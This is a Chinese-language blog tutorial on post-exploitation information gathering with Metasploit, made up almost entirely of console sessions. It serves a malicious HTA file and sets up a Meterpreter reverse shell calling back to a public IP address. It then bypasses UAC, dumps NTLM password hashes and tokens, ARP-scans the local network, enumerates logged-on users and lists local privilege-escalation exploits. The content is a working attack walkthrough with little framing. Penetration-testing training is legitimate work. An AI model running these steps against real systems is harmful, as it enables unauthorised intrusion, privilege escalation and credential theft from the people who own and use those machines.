欢迎光临
我们一直在努力

metasploit渗透测试之信息收集(一)

前言


千里之行,始于足下
信息收集,这里仅仅只是开始
信息收集,我们从此开始去挖掘更多有价值的信息
关注杂术馆,与小编一起学习,一起进步

反弹meterpreter


msf > use exploit/windows/misc/hta_server
msf exploit(hta_server) > show options

Module options (exploit/windows/misc/hta_server):

 ? Name ? ? Current Setting ?Required ?Description
 ? ---- ? ? --------------- ?-------- ?-----------
 ? SRVHOST ?0.0.0.0 ? ? ? ? ?yes ? ? ? The local host to listen on. This must be an address on the local machine or 0.0.0.0
 ? SRVPORT ?8080 ? ? ? ? ? ? yes ? ? ? The local port to listen on.
 ? SSL ? ? ?false ? ? ? ? ? ?no ? ? ? ?Negotiate SSL for incoming connections
 ? SSLCert ? ? ? ? ? ? ? ? ? no ? ? ? ?Path to a custom SSL certificate (default is randomly generated)
 ? URIPATH ? ? ? ? ? ? ? ? ? no ? ? ? ?The URI to use for this exploit (default is random)

Exploit target:

 ? Id ?Name
 ? -- ?----
 ? 0 ? Powershell x86

msf exploit(hta_server) > set srvhost 104.224.179.110
srvhost => 104.224.179.110
msf exploit(hta_server) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(hta_server) > set lport ?8090
lport => 8090
msf exploit(hta_server) > set lhost ?104.224.179.110
lhost => 104.224.179.110
msf exploit(hta_server) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 104.224.179.110:8090
[*] Using URL: http://104.224.179.110:8080/Qar5At0gh.hta
[*] Server started.

bypassuac


msf exploit(hta_server) > search bypassuac
[!] Module database cache not built yet, using slow search

Matching Modules
================

 ? Name ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? Disclosure Date ?Rank ? ? ? Description
 ? ---- ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? --------------- ?---- ? ? ? -----------
 ? exploit/windows/local/bypassuac ? ? ? ? ? ?2010-12-31 ? ? ? excellent ?Windows Escalate UAC Protection Bypass
 ? exploit/windows/local/bypassuac_eventvwr ? 2016-08-15 ? ? ? excellent ?Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
 ? exploit/windows/local/bypassuac_injection ?2010-12-31 ? ? ? excellent ?Windows Escalate UAC Protection Bypass (In Memory Injection)
 ? exploit/windows/local/bypassuac_vbs ? ? ? ?2015-08-22 ? ? ? excellent ?Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)

msf exploit(hta_server) > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set session 1
session => 1
msf exploit(bypassuac) > run

[*] Started reverse TCP handler on 104.224.179.110:4444
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (957487 bytes) to 58.63.130.255
[*] Meterpreter session 2 opened (104.224.179.110:4444 -> 58.63.130.255:8166) at 2017-05-12 02:25:16 -0400

meterpreter > background
[*] Backgrounding session 2...
msf exploit(bypassuac) > sessions

Active sessions
===============

 ?Id ?Type ? ? ? ? ? ? ? ? ? ? Information ? ? ? ? ? ? Connection
 ?-- ?---- ? ? ? ? ? ? ? ? ? ? ----------- ? ? ? ? ? ? ----------
 ?1 ? meterpreter x86/windows ?Yuex-PC\Yuex @ YUEX-PC ?104.224.179.110:8090 -> 58.63.130.255:9212 (172.16.68.158)
 ?2 ? meterpreter x86/windows ?Yuex-PC\Yuex @ YUEX-PC ?104.224.179.110:4444 -> 58.63.130.255:8166 (172.16.68.158)

msf exploit(bypassuac) >

windows的hash信息收集

密码抓去方式1


msf exploit(bypassuac) > search hashdump
[!] Module database cache not built yet, using slow search

Matching Modules
================

 ? Name ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?Disclosure Date ?Rank ? ?Description
 ? ---- ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?--------------- ?---- ? ?-----------
 ? auxiliary/analyze/jtr_crack_fast ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? normal ?John the Ripper Password Cracker (Fast Mode)
 ? auxiliary/analyze/jtr_mssql_fast ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? normal ?John the Ripper MS SQL Password Cracker (Fast Mode)
 ? auxiliary/analyze/jtr_mysql_fast ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? normal ?John the Ripper MySQL Password Cracker (Fast Mode)
 ? auxiliary/analyze/jtr_oracle_fast ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?normal ?John the Ripper Oracle Password Cracker (Fast Mode)
 ? auxiliary/analyze/jtr_postgres_fast ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?normal ?John the Ripper Postgres SQL Password Cracker
 ? auxiliary/scanner/mssql/mssql_hashdump ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? normal ?MSSQL Password Hashdump
 ? auxiliary/scanner/mysql/mysql_authbypass_hashdump ? ? 2012-06-09 ? ? ? normal ?MySQL Authentication Bypass Password Dump
 ? auxiliary/scanner/mysql/mysql_hashdump ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? normal ?MYSQL Password Hashdump
 ? auxiliary/scanner/oracle/oracle_hashdump ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? normal ?Oracle Password Hashdump
 ? auxiliary/scanner/postgres/postgres_hashdump ? ? ? ? ? ? ? ? ? ? ? ? ? normal ?Postgres Password Hashdump
 ? post/aix/hashdump ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?normal ?AIX Gather Dump Password Hashes
 ? post/linux/gather/hashdump ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? normal ?Linux Gather Dump Password Hashes for Linux Systems
 ? post/osx/gather/hashdump ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? normal ?OS X Gather Mac OS X Password Hash Collector
 ? post/solaris/gather/hashdump ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? normal ?Solaris Gather Dump Password Hashes for Solaris Systems
 ? post/windows/gather/credentials/domain_hashdump ? ? ? ? ? ? ? ? ? ? ? ?normal ?Windows Domain Controller Hashdump
 ? post/windows/gather/credentials/mcafee_vse_hashdump ? ? ? ? ? ? ? ? ? ?normal ?McAfee Virus Scan Enterprise Password Hashes Dump
 ? post/windows/gather/credentials/mssql_local_hashdump ? ? ? ? ? ? ? ? ? normal ?Windows Gather Local SQL Server Hash Dump
 ? post/windows/gather/hashdump ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? normal ?Windows Gather Local User Account Password Hashes (Registry)
 ? post/windows/gather/smart_hashdump ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? normal ?Windows Gather Local and Domain Controller Account Password Hashes

msf exploit(bypassuac) > use post/windows/gather/hashdump
msf post(hashdump) > setsession 2
[-] Unknown command: setsession.
msf post(hashdump) > set session 2
session => 2
msf post(hashdump) > run

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 79a15b1fd00ada01144f0f590c1e4a25...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

Yuex:"dd"

[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Yuex:1001:aad3b435b51404eeaad3b435b51404ee:cde76edade591827ec01783ffd36d673:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:09e6822ff34047d993ea5f26957fea9a:::

[*] Post module execution completed

如果是域的话,抓密码方式可以使用下面的方式来完成


msf post(hashdump) > use post/windows/gather/smart_hashdump
msf post(smart_hashdump) > set session 2
session => 2
msf post(smart_hashdump) > run

[*] Running module against YUEX-PC
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20170512022823_default_172.16.68.158_windows.hashes_052429.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*] ? ? Obtaining the boot key...
[*] ? ? Calculating the hboot key using SYSKEY 79a15b1fd00ada01144f0f590c1e4a25...
[*] ? ? Obtaining the user list and keys...
[*] ? ? Decrypting user keys...
[*] ? ? Dumping password hints...
[+] ? ? Yuex:"dd"
[*] ? ? Dumping password hashes...
[+] ? ? Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] ? ? HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:09e6822ff34047d993ea5f26957fea9a:::
[*] Post module execution completed
msf post(smart_hashdump) >

arp_scanner


meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24

[*] Running module against V-MAC-XP
[*] ARP Scanning 192.168.1.0/24
[*] ? ? IP: 192.168.1.1 MAC b2:a8:1d:e0:68:89
[*] ? ? IP: 192.168.1.2 MAC 0:f:b5:fc:bd:22
[*] ? ? IP: 192.168.1.11 MAC 0:21:85:fc:96:32
[*] ? ? IP: 192.168.1.13 MAC 78:ca:39:fe:b:4c
[*] ? ? IP: 192.168.1.100 MAC 58:b0:35:6a:4e:cc
[*] ? ? IP: 192.168.1.101 MAC 0:1f:d0:2e:b5:3f
[*] ? ? IP: 192.168.1.102 MAC 58:55:ca:14:1e:61
[*] ? ? IP: 192.168.1.105 MAC 0:1:6c:6f:dd:d1
[*] ? ? IP: 192.168.1.106 MAC c:60:76:57:49:3f
[*] ? ? IP: 192.168.1.195 MAC 0:c:29:c9:38:4c
[*] ? ? IP: 192.168.1.194 MAC 12:33:a0:2:86:9b
[*] ? ? IP: 192.168.1.191 MAC c8:bc:c8:85:9d:b2
[*] ? ? IP: 192.168.1.193 MAC d8:30:62:8c:9:ab
[*] ? ? IP: 192.168.1.201 MAC 8a:e9:17:42:35:b0
[*] ? ? IP: 192.168.1.203 MAC 3e:ff:3c:4c:89:67
[*] ? ? IP: 192.168.1.207 MAC c6:b3:a1:bc:8a:ec
[*] ? ? IP: 192.168.1.199 MAC 1c:c1:de:41:73:94
[*] ? ? IP: 192.168.1.209 MAC 1e:75:bd:82:9b:11
[*] ? ? IP: 192.168.1.220 MAC 76:c4:72:53:c1:ce
[*] ? ? IP: 192.168.1.221 MAC 0:c:29:d7:55:f
[*] ? ? IP: 192.168.1.250 MAC 1a:dc:fa:ab:8b:b
meterpreter >

credential_collector权限收集


meterpreter > run post/windows/gather/credentials/credential_collector

[*] Running module against V-MAC-XP
[+] Collecting hashes...
 ? ?Extracted: Administrator:7bf4f254f224bb24aad3b435b51404ee:2892d23cdf84d7a70e2eb2b9f05c425e
 ? ?Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
 ? ?Extracted: HelpAssistant:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714
 ? ?Extracted: SUPPORT_388945a0:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287
[+] Collecting tokens...
 ? ?NT AUTHORITY\LOCAL SERVICE
 ? ?NT AUTHORITY\NETWORK SERVICE
 ? ?NT AUTHORITY\SYSTEM
 ? ?NT AUTHORITY\ANONYMOUS LOGON
meterpreter >

枚举登陆的用户


meterpreter > run post/windows/gather/enum_logged_on_users

[*] Running against session 1

Current Logged Users
====================

 SID ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?User
 --- ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?----
 S-1-5-21-628913648-3499400826-3774924290-1000 ?WIN7-X86\victim
 S-1-5-21-628913648-3499400826-3774924290-1004 ?WIN7-X86\hacker

[*] Results saved in: /root/.msf4/loot/20170501172925_pwk_192.168.0.6_host.users.activ_736219.txt

Recently Logged Users
=====================

 SID ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?Profile Path
 --- ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?------------
 S-1-5-18 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? %systemroot%\system32\config\systemprofile
 S-1-5-19 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? C:\Windows\ServiceProfiles\LocalService
 S-1-5-20 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? C:\Windows\ServiceProfiles\NetworkService
 S-1-5-21-628913648-3499400826-3774924290-1000 ?C:\Users\victim
 S-1-5-21-628913648-3499400826-3774924290-1004 ?C:\Users\hacker

meterpreter >

本地提权建议local_exploit_suggester


msf > use post/multi/recon/local_exploit_suggester
msf post(local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

 ? Name ? ? ? ? ? ? Current Setting ?Required ?Description
 ? ---- ? ? ? ? ? ? --------------- ?-------- ?-----------
 ? SESSION ? ? ? ? ?2 ? ? ? ? ? ? ? ?yes ? ? ? The session to run this module on.
 ? SHOWDESCRIPTION ?false ? ? ? ? ? ?yes ? ? ? Displays a detailed description for the available exploits

msf post(local_exploit_suggester) > run

[*] 192.168.101.129 - Collecting local exploits for x86/windows...
[*] 192.168.101.129 - 31 exploit checks are being tried...
[+] 192.168.101.129 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 192.168.101.129 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.101.129 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.101.129 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 192.168.101.129 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[*] Post module execution completed

最后

这里仅仅只是开始,欢迎关注杂术馆,让我们一起去探索这个美妙的世界吧。
喜欢我们就请长按下面的图片关注我们吧。

0?wx_fmt=jpeg metasploit渗透测试之信息收集(一)

未经允许不得转载:杂术馆 » metasploit渗透测试之信息收集(一)
分享到: 更多 (0)

评论 抢沙发